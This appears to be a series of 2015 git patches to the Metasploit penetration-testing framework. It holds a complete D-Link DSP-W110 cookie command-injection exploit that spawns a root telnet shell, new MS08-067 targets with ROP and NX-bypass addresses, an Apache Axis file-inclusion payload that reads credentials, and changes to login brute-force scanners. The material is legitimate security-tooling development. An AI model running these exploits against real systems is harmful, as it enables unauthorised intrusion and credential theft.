   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   [...]
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   [...]
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
---
 .../exploits/windows/smb/ms08_067_netapi.rb   | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)

diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index bbd5ac0eac..b16a60edf2 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -621,6 +621,27 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408,
            }
           ],
+          
+          # Standard return-to-ESI without NX bypass
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NO NX)',
+            {
+              'Ret'       => 0x71ac1c40 ,
+              'Scratch'   => 0x00020408,
+            }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP1
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NX)',
+            {
+              'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
+              'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
+              'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
 
           # Standard return-to-ESI without NX bypass
           ['Windows 2003 SP2 English (NO NX)',
@@ -697,6 +718,27 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408
            }
           ], # JMP ESI WS2HELP.DLL
+          
+          # Standard return-to-ESI without NX bypass
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP2 French (NO NX)',
+            {
+              'Ret'       => 0x71AC2069,
+              'Scratch'   => 0x00020408,
+            }
+          ], # CALL ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP2 French (NX)',
+            {
+              'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
 
           #
           # Missing Targets

From c7cda25582f8f01242cffec00573e2431bf1fda1 Mon Sep 17 00:00:00 2001
From: 0xFFFFFF <omar.mezrag@gmail.com>
Date: Sat, 13 Jun 2015 14:54:10 +0100
Subject: [PATCH 0406/1013] Empty lines removed at line 624 and line 721.

Empty lines removed at line 624 and line 721.
---
 modules/exploits/windows/smb/ms08_067_netapi.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index b16a60edf2..ec7bd17085 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -621,7 +621,6 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408,
            }
           ],
-          
           # Standard return-to-ESI without NX bypass
           # Added by Omar MEZRAG - 0xFFFFFF
           [ 'Windows 2003 SP1 French (NO NX)',
@@ -718,7 +717,6 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408
            }
           ], # JMP ESI WS2HELP.DLL
-          
           # Standard return-to-ESI without NX bypass
           # Added by Omar MEZRAG - 0xFFFFFF
           [ 'Windows 2003 SP2 French (NO NX)',

From 1b040f337425acec78136c4620b3c940a332bae6 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Sat, 13 Jun 2015 21:45:56 +0200
Subject: [PATCH 0407/1013] dsp-w110-command-injection

---
 .../http/dlink_dspw100_cookie_noauth_exec.rb  | 119 ++++++++++++++++++
 1 file changed, 119 insertions(+)
 create mode 100644 modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb

diff --git a/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
new file mode 100644
index 0000000000..1fdc397291
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link Cookie Command Execution',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on different D-Link
+        devices. The vulnerability is a command injection in the cookie handling process of the
+        lighttpd web server when handling specially crafted cookie values. This module has been
+        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+      },
+      'Author'         =>
+        [
+          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'References'     =>
+        [
+          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
+        ],
+      'DisclosureDate' => 'Jun 12 2015',
+      'Targets' =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'    => '/',
+        'method' => 'GET',
+      })
+
+      if res && res.headers["Server"] =~ /lighttpd\/1.4.34/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
+
+    cmd = "telnetd -p #{telnetport}"
+
+    execute_command(cmd)
+
+    handle_telnet(telnetport)
+  end
+
+  def handle_telnet(telnetport)
+
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{peer} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def execute_command(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method'        => 'GET',
+        'uri'           => "/",
+        'cookie'        => "i=`#{cmd}`"
+      }, 5)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

From c801e52f6065cc8e38731fbdd8be5288ab2a456e Mon Sep 17 00:00:00 2001
From: Joshua Abraham <jabra@spl0it.org>
Date: Sat, 13 Jun 2015 17:02:43 -0400
Subject: [PATCH 0408/1013] Update smb_enumusers_domain.rb

---
 modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index 250b2b9cf0..c0eac538da 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description' => 'Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.',
       'Author'      =>
         [
-          'natron', # orignal module
+          'natron', # original module
           'Joshua D. Abraham <jabra[at]praetorian.com>', # database storage
         ],
       'References'  =>

From ab6f3a73738e52551d829a338fe9d1f6d2e4441e Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 13 Jun 2015 18:26:56 -0500
Subject: [PATCH 0409/1013] Fix #5531, the ```stage_payload``` method does not
 take arguments.

---
 lib/msf/core/payload/stager.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index 4b33c00898..574e3ef6ae 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -138,7 +138,8 @@ module Msf::Payload::Stager
     if stage_assembly and !stage_assembly.empty?
       raw = build(stage_assembly, stage_offsets)
     else
-      raw = stage_payload(opts).dup
+      # Options get ignored by the stage_payload method
+      raw = stage_payload
     end
 
     # Substitute variables in the stage

From 145637470a6dc4c3fe3a2029b9660d481e05a657 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Sun, 14 Jun 2015 08:27:23 +0200
Subject: [PATCH 0410/1013] port, email, cleanup

---
 ...h_exec.rb => dlink_dspw110_cookie_noauth_exec.rb} | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)
 rename modules/exploits/linux/http/{dlink_dspw100_cookie_noauth_exec.rb => dlink_dspw110_cookie_noauth_exec.rb} (92%)

diff --git a/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
similarity index 92%
rename from modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
rename to modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index 1fdc397291..b971cd2655 100644
--- a/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -18,11 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an anonymous remote code execution vulnerability on different D-Link
         devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
-        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
+        device.
       },
       'Author'         =>
         [
-          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
           'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -67,12 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
-
-    cmd = "telnetd -p #{telnetport}"
-
+    cmd = "telnetd -l/bin/sh"
     execute_command(cmd)
-
+    telnetport = 23
     handle_telnet(telnetport)
   end
 

From c20cf15104e01b9da65ba232070504dba3cf732e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 15 Jun 2015 02:58:31 -0500
Subject: [PATCH 0411/1013] Msut have last_attempted_at key

---
 modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
index cab0349b09..1fdc49158d 100644
--- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
@@ -132,6 +132,7 @@ class Metasploit3 < Msf::Auxiliary
     }.merge(service_data)
 
     login_data = {
+      last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)

From 308b1a3d7f0e263b6c23b7af32363836b5d80287 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 15 Jun 2015 03:21:09 -0500
Subject: [PATCH 0412/1013] Don't deregister username & password

---
 modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
index e4152f00a1..cc84d5e74c 100644
--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -38,7 +38,6 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     register_options([Opt::RPORT(31001)], self.class)
-    deregister_options('PASSWORD', 'USERNAME')
   end
 
   def run_host(ip)

From 940d0450297938cfc42a81e388ed375571caa5b0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 15 Jun 2015 03:23:39 -0500
Subject: [PATCH 0413/1013] Correctly report rport

---
 modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
index cc84d5e74c..4918004f32 100644
--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
       report_cred(
         ip: ip,
-        port: 21,
+        port: datastore['RPORT'],
         user: info[:username],
         password: info[:password],
         service_name: 'ftp'

From 80f1173fcfce9b241d181c3322fc3ac024879df0 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Mon, 15 Jun 2015 10:12:07 -0700
Subject: [PATCH 0414/1013] Style and scanner usability cleanup for ssh_version

---
 modules/auxiliary/scanner/ssh/ssh_version.rb | 65 +++++++++++---------
 1 file changed, 36 insertions(+), 29 deletions(-)

diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb
index 3a0f37834e..20a0768efd 100644
--- a/modules/auxiliary/scanner/ssh/ssh_version.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_version.rb
@@ -5,67 +5,74 @@
 
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
+  # the default timeout (in seconds) to wait, in total, for both a successful
+  # connection to a given endpoint and for the initial protocol response
+  # from the supposed SSH endpoint to be returned
+  DEFAULT_TIMEOUT = 30
+
   def initialize
     super(
       'Name'        => 'SSH Version Scanner',
       'Description' => 'Detect SSH Version.',
       'References'  =>
         [
-          [ 'URL', 'http://en.wikipedia.org/wiki/SecureShell' ],
+          [ 'URL', 'http://en.wikipedia.org/wiki/SecureShell' ]
         ],
       'Author'      => [ 'Daniel van Eeden <metasploit[at]myname.nl>' ],
       'License'     => MSF_LICENSE
     )
 
     register_options(
-    [
-      Opt::RPORT(22),
-      OptInt.new('TIMEOUT', [true, 'Timeout for the SSH probe', 30])
-    ], self.class)
+      [
+        Opt::RPORT(22),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the SSH probe', DEFAULT_TIMEOUT])
+      ],
+      self.class
+    )
   end
 
-  def to
-    return 30 if datastore['TIMEOUT'].to_i.zero?
-    datastore['TIMEOUT'].to_i
+  def timeout
+    datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']
   end
 
   def run_host(target_host)
     begin
-      ::Timeout.timeout(to) do
-
+      ::Timeout.timeout(timeout) do
         connect
 
-        resp = sock.get_once(-1, 5)
+        resp = sock.get_once(-1, timeout)
 
-        if (resp and resp =~ /SSH/)
-          ver,msg = (resp.split(/[\r\n]+/))
-          # Check to see if this is Kippo, which sends a premature
-          # key init exchange right on top of the SSH version without
-          # waiting for the required client identification string.
-          if msg and msg.size >= 5
-            extra = msg.unpack("NCCA*") # sz, pad_sz, code, data
-            if (extra.last.size+2 == extra[0]) and extra[2] == 20
-              ver << " (Kippo Honeypot)"
+        if resp
+          if resp =~ /^SSH/
+            ver, msg = resp.split(/[\r\n]+/)
+            # Check to see if this is Kippo, which sends a premature
+            # key init exchange right on top of the SSH version without
+            # waiting for the required client identification string.
+            if msg && msg.size >= 5
+              extra = msg.unpack("NCCA*") # sz, pad_sz, code, data
+              if (extra.last.size + 2 == extra[0]) && extra[2] == 20
+                ver << " (Kippo Honeypot)"
+              end
             end
+            print_status("#{target_host}:#{rport}, SSH server version: #{ver}")
+            report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ver)
+          else
+            vprint_warning("#{target_host}:#{rport} was not SSH --"  \
+                          " #{resp.size} bytes beginning with #{resp[0, 12]}")
           end
-          print_status("#{target_host}:#{rport}, SSH server version: #{ver}")
-          report_service(:host => rhost, :port => rport, :name => "ssh", :proto => "tcp", :info => ver)
         else
-          print_error("#{target_host}:#{rport}, SSH server version detection failed!")
+          vprint_warning("#{target_host}:#{rport} no response")
         end
-
-        disconnect
       end
-
     rescue Timeout::Error
-      print_error("#{target_host}:#{rport}, Server timed out after #{to} seconds. Skipping.")
+      vprint_warning("#{target_host}:#{rport} timed out after #{timeout} seconds. Skipping.")
+    ensure
+      disconnect
     end
   end
 end

From feb7263137688fc11ba3809a69cf1a7b82cdde8a Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Mon, 15 Jun 2015 11:42:20 -0700
Subject: [PATCH 0415/1013] Wire in recog support for ssh_version

---
 modules/auxiliary/scanner/ssh/ssh_version.rb | 26 ++++++++++++++------
 1 file changed, 19 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb
index 20a0768efd..21d83073f7 100644
--- a/modules/auxiliary/scanner/ssh/ssh_version.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_version.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'recog'
 
 class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
@@ -36,10 +37,15 @@ class Metasploit3 < Msf::Auxiliary
     )
   end
 
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
   def timeout
     datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']
   end
 
+
   def run_host(target_host)
     begin
       ::Timeout.timeout(timeout) do
@@ -48,19 +54,25 @@ class Metasploit3 < Msf::Auxiliary
         resp = sock.get_once(-1, timeout)
 
         if resp
-          if resp =~ /^SSH/
-            ver, msg = resp.split(/[\r\n]+/)
+          ident, first_message = resp.split(/[\r\n]+/)
+          if /^SSH-\d+\.\d+-(?<banner>.*)$/ =~ ident
+            if recog_match = Recog::Nizer.match('ssh.banner', banner)
+              info = recog_match.to_s
+            else
+              info = 'UNKNOWN'
+              print_warning("#{peer} unknown SSH banner: #{banner}")
+            end
             # Check to see if this is Kippo, which sends a premature
             # key init exchange right on top of the SSH version without
             # waiting for the required client identification string.
-            if msg && msg.size >= 5
-              extra = msg.unpack("NCCA*") # sz, pad_sz, code, data
+            if first_message && first_message.size >= 5
+              extra = first_message.unpack("NCCA*") # sz, pad_sz, code, data
               if (extra.last.size + 2 == extra[0]) && extra[2] == 20
-                ver << " (Kippo Honeypot)"
+                info << " (Kippo Honeypot)"
               end
             end
-            print_status("#{target_host}:#{rport}, SSH server version: #{ver}")
-            report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ver)
+            print_status("#{target_host}:#{rport}, SSH server version: #{ident}")
+            report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: info)
           else
             vprint_warning("#{target_host}:#{rport} was not SSH --"  \
                           " #{resp.size} bytes beginning with #{resp[0, 12]}")

From 079a9d449cba0e5ebeb4d50100c74d2228993dfa Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Mon, 15 Jun 2015 11:45:55 -0700
Subject: [PATCH 0416/1013] Use peer

---
 modules/auxiliary/scanner/ssh/ssh_version.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb
index 21d83073f7..acce585636 100644
--- a/modules/auxiliary/scanner/ssh/ssh_version.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_version.rb
@@ -71,18 +71,18 @@ class Metasploit3 < Msf::Auxiliary
                 info << " (Kippo Honeypot)"
               end
             end
-            print_status("#{target_host}:#{rport}, SSH server version: #{ident}")
+            print_status("#{peer}, SSH server version: #{ident}")
             report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: info)
           else
-            vprint_warning("#{target_host}:#{rport} was not SSH --"  \
+            vprint_warning("#{peer} was not SSH --"  \
                           " #{resp.size} bytes beginning with #{resp[0, 12]}")
           end
         else
-          vprint_warning("#{target_host}:#{rport} no response")
+          vprint_warning("#{peer} no response")
         end
       end
     rescue Timeout::Error
-      vprint_warning("#{target_host}:#{rport} timed out after #{timeout} seconds. Skipping.")
+      vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.")
     ensure
       disconnect
     end

From fd0b42be4a64257df7c5843ac44b5a4a292147f4 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Mon, 15 Jun 2015 12:45:14 -0700
Subject: [PATCH 0417/1013] Properly store quake service info

---
 modules/auxiliary/scanner/quake/server_info.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb
index 259a1110df..7d4c9e24ea 100644
--- a/modules/auxiliary/scanner/quake/server_info.rb
+++ b/modules/auxiliary/scanner/quake/server_info.rb
@@ -55,10 +55,13 @@ class Metasploit3 < Msf::Auxiliary
       stuff = decode_info(response)
     when 'status'
       stuff = decode_status(response)
+    else
+      stuff = {}
     end
 
     if datastore['VERBOSE']
-      stuff.inspect
+      # get everything
+      stuff
     else
       # try to get the host name, game name and version
       stuff.select { |k, _| %w(hostname sv_hostname gamename com_gamename version).include?(k) }
@@ -68,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
   def scanner_process(response, src_host, src_port)
     stuff = decode_stuff(response)
     return unless stuff
-    @results[src_host] ||= []
+    @results[src_host] ||= {}
     print_good("#{src_host}:#{src_port} found '#{stuff}'")
-    @results[src_host] << stuff
+    @results[src_host].merge!(stuff)
   end
 
   def scanner_postscan(_batch)
@@ -81,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
         proto: 'udp',
         port: rport,
         name: 'Quake',
-        info: stuff
+        info: stuff.inspect
       )
     end
   end

From 0b88e86a490bf0039978ceb7ae3389256e80cf00 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 15 Jun 2015 16:06:57 -0500
Subject: [PATCH 0418/1013] Using the new cred API for multiple auxiliary
 modules

---
 .../scanner/http/axis_local_file_include.rb   |  36 +++--
 .../auxiliary/scanner/http/cisco_asa_asdm.rb  |  38 +++--
 .../scanner/http/cisco_ironport_enum.rb       |  38 +++--
 .../auxiliary/scanner/http/cisco_ssl_vpn.rb   |  40 +++--
 .../http/dlink_dir_300_615_http_login.rb      |  37 +++--
 .../scanner/http/dlink_dir_615h_http_login.rb |  36 +++--
 .../http/dlink_dir_session_cgi_http_login.rb  |  36 +++--
 .../auxiliary/scanner/http/dolibarr_login.rb  |  36 +++--
 .../scanner/http/drupal_views_user_enum.rb    |  26 ++++
 .../scanner/http/ektron_cms400net.rb          |  38 +++--
 .../scanner/http/etherpad_duo_login.rb        |  37 +++--
 .../auxiliary/scanner/http/infovista_enum.rb  |  39 +++--
 .../scanner/http/joomla_bruteforce_login.rb   |  39 +++--
 .../scanner/http/novell_mdm_creds.rb          |  34 ++++-
 .../scanner/http/splunk_web_login.rb          |  34 ++++-
 modules/auxiliary/scanner/http/vcms_login.rb  |  36 +++--
 .../auxiliary/scanner/misc/cctv_dvr_login.rb  |  37 +++--
 .../scanner/telnet/telnet_ruggedcom.rb        |  36 +++--
 .../scanner/vmware/vmware_http_login.rb       |  34 ++++-
 modules/auxiliary/voip/asterisk_login.rb      |  36 +++--
 .../auxiliary/test/report_auth_info.rb        | 142 ++++++++++++++++++
 21 files changed, 678 insertions(+), 187 deletions(-)
 create mode 100644 test/modules/auxiliary/test/report_auth_info.rb

diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb
index 570df1e2b1..36d12c6d3a 100644
--- a/modules/auxiliary/scanner/http/axis_local_file_include.rb
+++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb
@@ -70,6 +70,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def get_credentials(uri)
     lfi_payload = "?xsd=../conf/axis2.xml"
 
@@ -96,15 +122,7 @@ class Metasploit3 < Msf::Auxiliary
 
           print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
 
-          report_auth_info(
-            :host => rhost,
-            :port => rport,
-            :sname => (ssl ? 'https' : 'http'),
-            :user => username,
-            :pass => password,
-            :proof => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}",
-            :active => true
-          )
+          report_cred(ip: rhost, port: rport, user: username, password: password)
 
         else
           print_error("#{target_url} - Apache Axis - Not Vulnerable")
diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index a5ea996e81..b01d8af730 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -88,6 +88,32 @@ class Metasploit3 < Msf::Auxiliary
       end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'Cisco ASA ASDM',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   # Brute-force the login page
   def do_login(user, pass)
     vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
@@ -113,17 +139,7 @@ class Metasploit3 < Msf::Auxiliary
 
         print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'Cisco ASA ASDM',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'
-        }
-
-        report_auth_info(report_hash)
+        report_cred(ip: rhost, port: rport, user: user, password: pass)
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
index e847117c01..3b79e2dda9 100644
--- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
+++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
@@ -114,6 +114,32 @@ class Metasploit3 < Msf::Auxiliary
       end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'Cisco IronPort Appliance',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -138,17 +164,7 @@ class Metasploit3 < Msf::Auxiliary
